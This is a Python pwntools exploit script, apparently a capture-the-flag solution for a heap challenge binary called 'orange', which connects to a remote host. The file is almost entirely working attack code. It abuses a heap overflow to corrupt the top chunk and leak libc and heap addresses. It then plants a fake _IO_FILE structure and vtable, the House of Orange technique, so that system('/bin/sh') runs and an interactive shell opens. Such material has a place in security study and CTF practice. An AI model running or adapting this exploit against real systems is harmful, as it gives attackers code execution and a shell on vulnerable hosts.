from pwn import *
#s = process("./orange")
s = remote("kshgroup.kr",1216)  # tube to the remote target; uncomment the process() line above instead to run against the local binary
elf = ELF('./orange')  # the challenge binary (loaded for reference; nothing below reads from it)
libc = ELF("./libc")  # the target's libc: symbols['system'] is resolved from it, and every hard-coded offset below assumes this exact build
def read(size, content):
    """Drive menu option 1 on the target: ask for a chunk of `size` bytes, then send `content`.

    Talks over the module-level pwntools tube `s`.  Each prompt is consumed
    before the matching reply goes out so the exchange stays in lock-step with
    the target; the prompt strings must match the target's output exactly.
    `content` goes through sendline(), so a newline is appended on the wire.
    """
    exchange = (
        (">> ", '1'),
        ("Size: ", str(size)),
        (">> ", content),
    )
    for prompt, reply in exchange:
        s.recvuntil(prompt)
        s.sendline(reply)
def re_read(index, content):
    """Drive menu option 2 on the target: select chunk `index`, then send `content`.

    The exploit below relies on this write not being bounded by the chunk's
    original size (it overflows into the following chunk header); that is a
    property of the remote program, not of this helper, which only replays
    the menu exchange over the module-level tube `s`.
    """
    prompts = (">> ", "Index: ", ">> ")
    replies = ('2', str(index), content)
    for prompt, reply in zip(prompts, replies):
        s.recvuntil(prompt)
        s.sendline(reply)
def write(index):
    """Drive menu option 3 on the target: select chunk `index` (the target then echoes its contents).

    Only the menu exchange happens here; the caller reads whatever the target
    prints from the tube `s` afterwards -- the exploit uses that echo to leak
    libc and heap pointers out of a recycled chunk.
    """
    for prompt, reply in ((">> ", "3"), ("Index: ", str(index))):
        s.recvuntil(prompt)
        s.sendline(reply)
#gdb.attach(s)
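# --- Stage 1: corrupt the top chunk size (House of Orange setup) -----------
# Chunk 0 is a 24-byte request (a 0x20 chunk).  The 24 'B's refill it and the
# trailing p64 overwrites the size field of whatever chunk follows it -- the
# top chunk -- with 0xfe1 (0xfe0 | PREV_INUSE); the edit must keep the top
# chunk page-aligned or the later sysmalloc() sanity check aborts.  re_read()
# is the overflow primitive the whole chain rests on.
read(24, "A" * 24)
re_read(0, "B" * 24 + p64(0xfe1))

# A 4096-byte request cannot be served from a 0xfe0 top chunk, so malloc grows
# the heap and frees the old top into the unsorted bin.  The 1024-byte request
# is then carved out of that freed chunk, so its first bytes still hold the
# libc/heap pointers malloc's bin bookkeeping left behind.
read(4096, "C" * 8)
read(1024, "D" * 8)

# --- Stage 2: leak libc and heap addresses out of chunk 2 -------------------
write(2)
s.recvuntil("D" * 8)
# recvn() blocks until exactly n bytes have arrived; recv(n) may return fewer
# when the target's output is split across TCP segments, and then u64() (which
# needs exactly 8 bytes) raises or the pointer is silently misparsed.
leak = u64(s.recvn(6) + "\x00\x00")
print("leak : " + hex(leak))

# Every constant below is specific to the libc the target runs (the copy in
# ./libc); another build shifts all of them and the exploit fails silently.
# NOTE(review): 0x3c510a is 2 mod 8, so an 8-byte-aligned arena pointer cannot
# sit at this distance from a page-aligned libc base -- either the target's
# output carries a stray byte ahead of the pointer or this constant is off.
# Confirm against a live run; the alignment check below catches the latter.
libc_base = leak - 0x3c510a
print("libc_base : " + hex(libc_base))
if libc_base & 0xfff:
    # libc is mmap'd page-aligned; a misaligned base means the leak offset (or
    # the leaked bytes) is wrong for this target.  Stop here rather than spray
    # a bogus fake FILE at the process.
    raise RuntimeError("libc_base " + hex(libc_base) + " is not page-aligned; leak offset does not match the target libc")

s.recvn(2)
heap = u64(s.recvn(6) + "\x00\x00")
heap = heap - 0x20  # leaked pointer minus 0x20 is treated as the heap base by the vtable math below
print("heap : " + hex(heap))

system = libc_base + libc.symbols['system']
main_arena = leak - 1514  # informational only (nothing below uses it)
print("system : " + hex(system))
print("main-arena : " + hex(main_arena))

# _IO_list_all for this libc build; hard-coded like the leak offset above.
io_list_all = libc_base + 0x3c5520
print("io_list_all : " + hex(io_list_all))

# --- Stage 3: fake _IO_FILE_plus + fake vtable (House of Orange) ------------
# The 0x400 'A's fill chunk 2's user data exactly; everything after them lands
# on the header of the chunk that follows it on the heap (presumably the freed
# old-top remainder), turning that chunk into a fake _IO_FILE_plus:
io_file = "/bin/sh\x00"              # prev_size / _flags: also the string passed to system()
io_file += p64(0x61)                 # size: 0x60|PREV_INUSE, so the chunk is filed in the 0x60 smallbin
io_file += p64(0)                    # fd
io_file += p64(io_list_all - 0x10)   # bk: unsorted-bin attack writes an arena pointer into _IO_list_all
io_file += p64(0)                    # _IO_write_base = 0 ...
io_file += p64(1)                    # ... < _IO_write_ptr = 1, the condition the stdio flush path checks
io_file = io_file.ljust(0xc0, "\x00")
io_file += p64(0)                    # _mode = 0 (offset 0xc0)
io_file = io_file.ljust(0xd8, "\x00")
io_file += p64(heap + 0x510)         # vtable pointer (offset 0xd8) -> io_jump below
# Fake vtable: only the entry at +0x18 (__overflow in _IO_jump_t) matters; when
# the target next allocates and malloc aborts on the corrupted bins, the stdio
# flush during abort() calls it with the fake FILE -- "/bin/sh" -- as argument.
io_jump = "\x00" * 0x18
io_jump += p64(system)

# heap+0x510 above must equal io_jump's address inside chunk 2; that follows
# from the allocation sequence above and must be re-derived if it changes.
pay = "A" * 0x400
pay += io_file
pay += io_jump
re_read(2, pay)
s.interactive()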